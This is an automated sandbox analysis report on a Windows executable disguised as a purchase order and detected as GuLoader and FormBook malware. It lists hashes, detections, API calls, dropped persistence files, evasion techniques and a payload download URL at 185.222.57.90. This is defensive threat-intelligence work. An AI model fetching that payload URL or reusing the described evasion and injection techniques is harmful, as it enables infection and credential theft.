Windows Analysis Report
Purchase Order Purchase Order Purchase Order Purchase Order.exe

Overview

General Information

Sample name:Purchase Order Purchase Order Purchase Order Purchase Order.exe
Analysis ID:1557894
MD5:b9a03fb0c2c7f23a1e4ccb0d79c5053c
SHA1:4d87c4ed89d8b92f2b6849dc6af6a8850f8e5e7c
SHA256:099369eb025c3e23b6669c872ac2572e7bc4ba9200eb4d6318284983ddb78e3f
Tags: exe, GuLoader, user-abuse_ch
Infos:

Detection

FormBook, GuLoader
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
AI detected suspicious sample
Initial sample is a PE file and has a suspicious name
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates processes with suspicious names
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000B.00000002.2689733923.0000000034480000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.1914988033.0000000003FC1000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-18T18:19:35.134009+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 53200 | 185.222.57.90 | 80 | TCP

      AV Detection

      Source: http://185.222.57.90/zFSrvbrRquo53.bin | Avira URL Cloud: Label: malware
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe | ReversingLabs: Detection: 27%
      Source: Yara match | File source: 0000000B.00000002.2689733923.0000000034480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Submited Sample | Integrated Neural Analysis Model: Matched 100.0% probability
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000001.1905312342.0000000000649000.00000008.00000001.01000000.00000006.sdmp
      Source: Binary string: wntdll.pdbUGP source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000003.2322463653.000000003448D000.00000004.00000020.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000003.2324475772.000000003463C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000003.2322463653.000000003448D000.00000004.00000020.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000003.2324475772.000000003463C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000001.1905312342.0000000000649000.00000008.00000001.01000000.00000006.sdmp
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,5_2_004059CC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_004065FD FindFirstFileW,FindClose,5_2_004065FD
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_00402868 FindFirstFileW,5_2_00402868
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe | File opened: C:\Users\user
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe | File opened: C:\Users\user\AppData\Roaming
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe | File opened: C:\Users\user\AppData
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts
      Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:53200 -> 185.222.57.90:80
      Source: global traffic | HTTP traffic detected: GET /zFSrvbrRquo53.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: 185.222.57.90 | Cache-Control: no-cache
      Source: unknown | TCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000002.2668899476.0000000004688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.222.57.90/
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000002.2668899476.0000000004688000.00000004.00000020.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000002.2689244390.0000000033CC0000.00000004.00001000.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000002.2668899476.00000000046C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.222.57.90/zFSrvbrRquo53.bin
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000002.2668899476.0000000004688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.222.57.90/zFSrvbrRquo53.bin55
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000002.2668899476.00000000046C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.222.57.90/zFSrvbrRquo53.binj
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000001.1905312342.0000000000649000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000001.1905312342.00000000005F2000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000001.1905312342.00000000005F2000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000001.1905312342.0000000000649000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_00405461 GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,LdrInitializeThunk,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,LdrInitializeThunk,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,5_2_00405461

      E-Banking Fraud

      Source: Yara matchFile source: 0000000B.00000002.2689733923.0000000034480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      System Summary

      Source: initial sampleStatic PE information: Filename: Purchase Order Purchase Order Purchase Order Purchase Order.exe
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeProcess Stats: CPU usage > 49%
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348635C0 NtCreateMutant,LdrInitializeThunk,11_2_348635C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862C70 NtFreeVirtualMemory,LdrInitializeThunk,11_2_34862C70
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862DF0 NtQuerySystemInformation,LdrInitializeThunk,11_2_34862DF0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862B60 NtClose,LdrInitializeThunk,11_2_34862B60
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34863090 NtSetValueKey,11_2_34863090
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34863010 NtOpenDirectoryObject,11_2_34863010
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34863D10 NtOpenProcessToken,11_2_34863D10
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34863D70 NtOpenThread,11_2_34863D70
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348639B0 NtGetContextThread,11_2_348639B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34864650 NtSuspendThread,11_2_34864650
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34864340 NtSetContextThread,11_2_34864340
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862CA0 NtQueryInformationToken,11_2_34862CA0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862CC0 NtQueryVirtualMemory,11_2_34862CC0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862CF0 NtOpenProcess,11_2_34862CF0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862C00 NtQueryInformationProcess,11_2_34862C00
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862C60 NtCreateKey,11_2_34862C60
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862DB0 NtEnumerateKey,11_2_34862DB0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862DD0 NtDelayExecution,11_2_34862DD0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862D00 NtSetInformationFile,11_2_34862D00
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862D10 NtMapViewOfSection,11_2_34862D10
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862D30 NtUnmapViewOfSection,11_2_34862D30
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862E80 NtReadVirtualMemory,11_2_34862E80
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862EA0 NtAdjustPrivilegesToken,11_2_34862EA0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862EE0 NtQueueApcThread,11_2_34862EE0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862E30 NtWriteVirtualMemory,11_2_34862E30
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862F90 NtProtectVirtualMemory,11_2_34862F90
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862FA0 NtQuerySection,11_2_34862FA0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862FB0 NtResumeThread,11_2_34862FB0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862FE0 NtCreateFile,11_2_34862FE0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862F30 NtCreateSection,11_2_34862F30
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862F60 NtCreateProcessEx,11_2_34862F60
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862AB0 NtWaitForSingleObject,11_2_34862AB0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862AD0 NtReadFile,11_2_34862AD0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862AF0 NtWriteFile,11_2_34862AF0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862B80 NtQueryInformationFile,11_2_34862B80
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862BA0 NtEnumerateValueKey,11_2_34862BA0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862BE0 NtQueryValueKey,11_2_34862BE0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862BF0 NtAllocateVirtualMemory,11_2_34862BF0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_0040338F EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,LdrInitializeThunk,GetTempPathW,GetWindowsDirectoryW,lstrcatW,LdrInitializeThunk,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,5_2_0040338F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe | File created: C:\Windows\Fonts\Gullis.lnk
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348A4F4011_2_348A4F40
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348168B811_2_348168B8
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3485E8F011_2_3485E8F0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3483A84011_2_3483A840
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3483284011_2_34832840
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348329A011_2_348329A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3484696211_2_34846962
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3482EA8011_2_3482EA80
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348EEB8911_2_348EEB89
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348E6BD711_2_348E6BD7
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348EAB4011_2_348EAB40
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe Code function: String function: 348AF290 appears 102 times
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe Code function: String function: 3481B970 appears 244 times
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe Code function: String function: 34877E54 appears 94 times
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe Code function: String function: 3489EA12 appears 70 times
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe Code function: String function: 34865130 appears 56 times
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000002.2689763841.0000000034AC1000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order Purchase Order Purchase Order Purchase Order.exe
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000003.2322463653.00000000345B0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order Purchase Order Purchase Order Purchase Order.exe
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000003.2324475772.0000000034769000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order Purchase Order Purchase Order Purchase Order.exe
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engine Classification label: mal88.troj.evad.winEXE@3/8@0/1
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe Code function: 5_2_0040338F EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,LdrInitializeThunk,GetTempPathW,GetWindowsDirectoryW,lstrcatW,LdrInitializeThunk,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess, 5_2_0040338F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe Code function: 5_2_00404722 GetDlgItem,SetWindowTextW,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,LdrInitializeThunk,MulDiv,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,SetDlgItemTextW, 5_2_00404722
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe Code function: 5_2_00402104 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,LdrInitializeThunk, 5_2_00402104
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe File created: C:\Users\user~1\AppData\Local\Temp\nsk58B4.tmp
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe File read: C:\Users\desktop.ini
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe ReversingLabs: Detection: 27%
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe File read: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
      Source: unknown Process created: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe Process created: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe Section loaded: uxtheme.dll, userenv.dll, apphelp.dll, propsys.dll, dwmapi.dll, cryptbase.dll, oleacc.dll, version.dll, shfolder.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll, riched20.dll, usp10.dll, msls31.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, profapi.dll, iertutil.dll, sspicli.dll, powrprof.dll, winhttp.dll, wkscli.dll, netutils.dll, umpdc.dll, wininet.dll, ondemandconnroutehelper.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
      Source: Gullis.lnk.5.dr LNK file: ..\..\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\lensaftalerne.sla
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000001.1905312342.0000000000649000.00000008.00000001.01000000.00000006.sdmp
      Source: Binary string: wntdll.pdbUGP source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000003.2322463653.000000003448D000.00000004.00000020.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000003.2324475772.000000003463C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000003.2322463653.000000003448D000.00000004.00000020.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000003.2324475772.000000003463C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000001.1905312342.0000000000649000.00000008.00000001.01000000.00000006.sdmp

      Data Obfuscation

      Source: Yara match File source: 00000005.00000002.1914988033.0000000003FC1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe Code function: 5_2_73CF1B63 LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW, 5_2_73CF1B63
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe Code function: 5_2_73CF2FD0 push eax; ret 5_2_73CF2FFE
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe Code function: 11_2_348209AD push ecx; mov dword ptr [esp], ecx 11_2_348209B6
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe File created: \purchase order purchase order purchase order purchase order.exe
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe File created: C:\Users\user\AppData\Local\Temp\nsk59ED.tmp\System.dll
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Vedbendens
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Vedbendens\Hoveddelenes.haa
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Clap
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Clap\Exoascaceous73.tra
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Atomizing.Eft
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Underemphasizing70.tio
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\sulkens.dic
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Klapperes
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Klapperes\vec.jpg
